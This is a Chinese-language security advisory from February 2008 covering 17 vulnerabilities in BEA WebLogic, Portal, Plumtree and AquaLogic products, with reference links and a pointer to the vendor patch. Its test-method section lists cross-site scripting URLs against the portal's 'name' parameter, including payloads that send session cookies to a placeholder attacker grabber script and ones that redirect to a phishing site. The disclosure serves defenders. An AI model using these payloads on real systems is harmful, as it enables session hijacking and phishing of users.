安全研究

安全漏洞
BEA Systems产品BEA08-183.00到BEA08-200.00更新修复多个漏洞

发布日期:2008-02-19
更新日期:2008-02-22

受影响系统:
BEA Systems WebLogic Express 6.x - 10.x
BEA Systems Weblogic Server 6.1 - 10.0
BEA Systems WebLogic Portal 7.0 - 10.0
BEA Systems Plumtree Foundation 6.0
BEA Systems Plumtree Collaboration 4.1
BEA Systems AquaLogic Interaction 6.1 MP1
BEA Systems Workshop for WebLogic 9.0 - 10.0
描述:
BUGTRAQ  ID: 27893
CVE(CAN) ID: CVE-2006-0423,CVE-2007-2695,CVE-2007-5232,CVE-2007-5236,CVE-2007-5237,CVE-2007-5238,CVE-2007-5239,CVE-2007-5240,CVE-2007-5273,CVE-2007-5274,CVE-2007-5689,CVE-2008-0863,CVE-2008-0864,CVE-2008-0865,CVE-2008-0866,CVE-2008-0867,CVE-2008-0868,CVE-2008-0869,CVE-2008-0870,CVE-2008-0895,CVE-2008-0896,CVE-2008-0897,CVE-2008-0898,CVE-2008-0899,CVE-2008-0900,CVE-2008-0901,CVE-2008-0902,CVE-2008-0903,CVE-2008-0904

BEA Systems WebLogic包含多种应用系统集成方案,包括Server/Express/Integration等。

BEA Weblogic中存在多个安全漏洞,可能允许恶意攻击者获得敏感信息、绕过某些安全限制或完全入侵系统。

1) 如果配置了SecureProxy参数的话,则在处理HttpClusterServlet和HttpProxyServlet代理servlet中请求中的错误可能允许用户访问只有管理员才可以访问的管理资源。

2) 没有正确地过滤某些输入参数便返回给了用户,这可能导致在用户浏览器会话中执行任意HTML和脚本代码。

3) 帐号锁定中的错误可能允许执行暴力猜测攻击。

4) 会话处理中的错误允许攻击者在用户受骗跟随了恶意链接并登陆后劫持用户会话。成功攻击要求访问服务器的控制台登录页面。

5) WebLogic Server管理控制台没有正确过滤某些输入便返回给了用户,这可能导致在管理用户的浏览器会话中执行任意HTML和脚本代码。

6) 分布式队列功能中的错误可能允许攻击者绕过对受保护分布式队列所定义的安全策略。

7) 攻击者可以从单机版(物理)JMS Topic目标或分布式Topic成员目标的成员检索消息。

8) 在处理内容portlet时的漏洞可能允许用户访问受限制的内容portlet。

9) 在Portal管理控制台中处理https时的错误可能导致通过http重新定向。

10) 处理HTML请求头中的错误可能允许非授权访问某些应用servlet。

11) 没有正确地过滤对NetUI框架的输入参数便返回给了用户,这可能导致在用户浏览器会话中执行任意HTML和脚本代码。

12) 数据库口令是以明文存储到config.xml文件中的,这可能向恶意用户暴露RDBMS认证提供者的数据库口令。成功攻击要求站点配置了RDBMS认证提供者。

13) 没有正确地过滤某些Groupspace函数的参数输入,这可能导致注入任意HTML和脚本代码,如果浏览了恶意数据就会在其他用户浏览器会话中执行这些代码。

14) 如果Web应用的页面流使用了WebLogic Workshop NetUI框架的话,则该应用没有正确地过滤某些参数输入便返回给了用户,这可能导致在用户浏览器会话中执行任意HTML和脚本代码。

15) 处理授权中的错误可能导致绕过可浮动WLP portlet例程的授权。

16) 处理页面授权中的安全漏洞可能导致未经通知便删除任意授权策略。

17) BEA的Web服务器插件中的错误可能通过特制的URL导致Sun、IIS或Apache web服务器进程崩溃。

<*来源:Ramón Pinuaga
        Mitja Kolsek
        Sasa Kos
  
  链接:http://secunia.com/advisories/29041/
        http://secunia.com/advisories/28991/
        http://secunia.com/advisories/29042/
        http://secunia.com/advisories/29040/
        http://www.procheckup.com/Vulnerability_PR06-12.php
        http://dev2dev.bea.com/pub/advisory/256
        http://dev2dev.bea.com/pub/advisory/257
        http://dev2dev.bea.com/pub/advisory/258
        http://dev2dev.bea.com/pub/advisory/259
        http://dev2dev.bea.com/pub/advisory/260
        http://dev2dev.bea.com/pub/advisory/261
        http://dev2dev.bea.com/pub/advisory/262
        http://dev2dev.bea.com/pub/advisory/263
        http://dev2dev.bea.com/pub/advisory/264
        http://dev2dev.bea.com/pub/advisory/265
        http://dev2dev.bea.com/pub/advisory/266
        http://dev2dev.bea.com/pub/advisory/267
        http://dev2dev.bea.com/pub/advisory/268
        http://dev2dev.bea.com/pub/advisory/269
        http://dev2dev.bea.com/pub/advisory/270
        http://dev2dev.bea.com/pub/advisory/271
        http://dev2dev.bea.com/pub/advisory/272
        http://dev2dev.bea.com/pub/advisory/273
        http://dev2dev.bea.com/pub/advisory/274
        http://dev2dev.bea.com/pub/advisory/275
        http://dev2dev.bea.com/pub/advisory/276
        http://marc.info/?l=bugtraq&m=120525807129091&w=2
        http://marc.info/?l=bugtraq&m=120525706926700&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>alert('CanCrossSiteScript')</script>
https://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ealert('CanCrossSiteScript')%3C/script%3E%3C!--
https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie</script>
http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[attackerssite]/grabber.php?c="%2bdocument.cookie%3C/script%3E%3C!--
https://[hostname]/portal/server.pt?open=space&name=</SCRIPT><script>window.location ="http://[phisherssite]"</script>
http://[hostname]/portal/server.pt?open=space&name=%22;}%3C/script%3E%3Cscript%3Ewindow.location="http://[phisherssite]%3C/script%3E%3C!--

建议:
厂商补丁:

BEA Systems
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.beasys.com/

浏览次数:2898
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障